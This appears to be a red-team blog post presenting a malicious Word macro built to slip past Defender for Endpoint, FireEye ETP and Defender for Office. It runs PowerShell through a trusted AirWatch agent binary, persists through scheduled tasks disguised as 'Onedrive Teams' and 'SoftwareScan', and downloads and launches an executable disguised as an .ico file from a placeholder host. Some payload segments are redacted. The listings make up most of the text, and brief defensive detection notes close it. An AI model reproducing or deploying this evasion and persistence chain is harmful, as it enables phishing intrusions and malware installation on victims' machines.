# MDE Defender+Fireeye ETP+MDO 环境下word宏collect

2023-05-09 07:23:19 Steven Xeldax

![](/download/5dff0c81-8117-4d05-aacd-314eab376808.png)

## macro

The `AutoOpen` macro builds a single command line and runs it hidden via `Shell`. The command launches a third-party management-agent binary (`AW.ProtectionAgent.PowershellExecutor64.exe`) with an `ExecutePowershell` verb and a long base64 argument, so the PowerShell stage is executed by that binary rather than by a `powershell.exe` child of Word. Note that the base64 in this listing is partially redacted: the `sec = sec & "X"` lines stand in for removed segments, so the string as printed will not decode cleanly. The readable tail of it (`$trigger=New-ScheduledTaskTrigger ...`, `"SoftwareScan"`, `-User $env:username -Action $action`) matches the scheduled-task script in the next section. The meaning of the trailing `" 100"` argument is not shown on this page.

```
Sub teest()
'
' teest Macro
'
'
End Sub
Sub AutoOpen()
Dim sec As String
sec = """C:\Program Files (x86)\Airwatch\AgentUI\AW.ProtectionAgent.PowershellExecutor64.exe"" ExecutePowershell "
sec = sec & "X"
sec = sec & "X"
sec = sec & "X"
sec = sec & "sYm5RdVVHOTNaWEp6YUdWc2JFVjRaV04xZEc5eU5qUXVaWGhsSWlJZ1JYaGxZM1YwWlZCdmQyVnljMmhsYkd3Z1NVTlNNV050ZDJkUVUwRnBZVU"
sec = sec & "hTTUdOSVRUWk1lVGx5V1ZkNGNFOUROWFpaYmsxMVdWaEJkR015T1RGa1IyaHNXVmhPTUV4VVJYVmlXR3h2WkZkR00xcFhiR3BpUnpreFdrTTFhbU"
sec = sec & "l5TUhaYWJVWXlUVmRPZG1KcE5YQlpNamhwUTJkdmExcEhWbnBrUTBFNVNVTkphMXBYTlRKUGJsSnNZbGhDWTFoSVRqSlpNbEpvVEcxV05GcFRTVX"
sec = sec & "REYld4dFNVTm5kR0p0T1RCSlEyaFZXbGhPTUV4V1FtaGtSMmRuU2tkU2JHTXpVWEJMVTBJM1EydHNkV1J0T1hKYVV6RllXbGRLVTFwWVJqRmFXRT"
sec = sec & "R3U1VNeFZtTnRhMmRLU0ZaNVlrTkJkRlF6VmpCU2JXeHpXbE5CYTFwSFZucGtRWEE1U1VkV2MyTXlWamREYkdSNVlWaFNiRXhWYUhaak0xRm5TV3R"
sec = sec & "hY0dKSFZXZFpWM2g1V2xkR2EyVlRRbXhsUjJ4NlpFUkZlRTFVUm5wTWFVbExabEZ2UzBwSVFubGlNazVzWXpOT1QxbFhNV3hKUkRCblNXNU9NbGt"
sec = sec & "X"
sec = sec & "X"
sec = sec & "X"
sec = sec & "WSFJqQmhRWEE1SURFd01DSUtiMkpxVTJobGJHd3VVblZ1SUd4aGRXNWphQ3dnTUN3Z1ZISjFaUT09Jyc7ICRkZWNvZGVkU2NyaXB0ID0gW1N5c3Rlb"
sec = sec & "X"
sec = sec & "bmNvZGluZyAnJ0FTQ0lJJycgLUlucHV0T2JqZWN0ICRkZWNvZGVkU2NyaXB0IC1GaWxlUGF0aCAkcSInCiRhY3Rpb24gPSBOZXctU2NoZWR1bGVkVGFz"
sec = sec & "a0FjdGlvbiAtRXhlY3V0ZSAicG93ZXJzaGVsbC5leGUiICAtQXJndW1lbnQgJGEKJHRyaWdnZXI9TmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmN"
sec = sec & "lIC1BdCAoZ2V0LWRhdGUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAxKQpSZWdpc3Rlci1TY2hlZHVsZWRUYXNrI"
sec = sec & "C1UYXNrTmFtZSAiT25lZHJpdmUgVGVhbXMiIC1UcmlnZ2VyICR0cmlnZ2VyIC1Vc2VyICRlbnY6dXNlcm5hbWUgLUFjdGlvbiAkYWN0aW9uCgokYWN"
sec = sec & "0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgIndzY3JpcHQuZXhlIiAgLUFyZ3VtZW50ICIkZW52OnRlbXBcXHN2Y2RhLnZi"
sec = sec & "cyIKJHRyaWdnZXI9TmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoZ2V0LWRhdGUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1Ua"
sec = sec & "W1lU3BhbiAtTWludXRlcyAyKQpSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiU29mdHdhcmVTY2FuIiAtVHJpZ2dlciAkdHJpZ2dlci"
sec = sec & "AtVXNlciAkZW52OnVzZXJuYW1lIC1BY3Rpb24gJGFjdGlvbiAK"
sec = sec & " 100"
Shell sec, vbHide
End Sub
```

## first step 创建定时任务 (register the scheduled tasks)

This is the PowerShell carried in the macro's base64 argument. It registers two scheduled tasks in the current user's context (`-User $env:username`; no `-RunLevel` is requested, so nothing here implies elevation). Task `Onedrive Teams` runs a hidden `powershell.exe` every minute that decodes a base64 blob (redacted here as `XXXXX==`) and writes it to `%TEMP%\svcda.vbs`; task `SoftwareScan` runs `wscript.exe` on that file every two minutes.

```
$a=' -WindowStyle hidden -Command "$q=$env:temp+''\\svcda.vbs'';$fc = ''XXXXX==''; $decodedScript = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($fc)); Out-File -Encoding ''ASCII'' -InputObject $decodedScript -FilePath $q"'
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $a
$trigger=New-ScheduledTaskTrigger -Once -At (get-date) -RepetitionInterval (New-TimeSpan -Minutes 1)
Register-ScheduledTask -TaskName "Onedrive Teams" -Trigger $trigger -User $env:username -Action $action

$action = New-ScheduledTaskAction -Execute "wscript.exe" -Argument "$env:temp\\svcda.vbs"
$trigger=New-ScheduledTaskTrigger -Once -At (get-date) -RepetitionInterval (New-TimeSpan -Minutes 2)
Register-ScheduledTask -TaskName "SoftwareScan" -Trigger $trigger -User $env:username -Action $action
```

## 定时任务内容1 (downloader stage)

This stage fetches a file served under an `.ico` name, stores it as `%TEMP%\svcda.exe`, and starts it if no process named `svcda` is already running. The page does not show how this script is invoked; presumably it is what the redacted `svcda.vbs` launches — confirm against the decoded VBS if you have it.

```
$url = "https://X.com/fav1con.ico"
$dest = "$env:temp\\svcda.exe"
if (-not (Test-Path $dest)) {
    Invoke-WebRequest -Uri $url -OutFile $dest
} else{
    Write-Host "File already exist1111s."
}
$processName = "svcda"
$programPath = "$env:temp\\svcda.exe"
if (-not (Get-Process $processName -ErrorAction SilentlyContinue)) {
    Start-Process -FilePath $programPath
}
```

## 定时任务2 (write the VBS)

Standalone form of the command that task `Onedrive Teams` executes: decode the (redacted) base64 and write it as ASCII to `%TEMP%\svcda.vbs`.

```
$fc = "XXXXXX=="
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($fc)) | Out-File -Encoding "ASCII" "$env:temp\\svcda.vbs"
```

## Reviewer notes (defensive observables grounded in the listings above)

- Process lineage: `WINWORD.EXE` launching `AW.ProtectionAgent.PowershellExecutor64.exe` with `ExecutePowershell` and a long base64 command-line argument. Office spawning a management-agent executor is not a normal user workflow and is the earliest point in this chain worth alerting on.
- `Register-ScheduledTask` from a PowerShell whose parent is that executor; task names `Onedrive Teams` and `SoftwareScan` with one- and two-minute repetition intervals, running as the interactive user.
- `powershell.exe -WindowStyle hidden` writing a `.vbs` into `%TEMP%`, followed by `wscript.exe` executing a script from `%TEMP%`.
- `Invoke-WebRequest` downloading a resource named `fav1con.ico` and saving it as an `.exe` in `%TEMP%`, followed by `Start-Process` on that path (file type / extension mismatch, and execution from a user-writable temp directory).
- Everything shown runs in the current user's context; this page documents initial execution and persistence only, and says nothing about privilege escalation or the content of `svcda.exe`.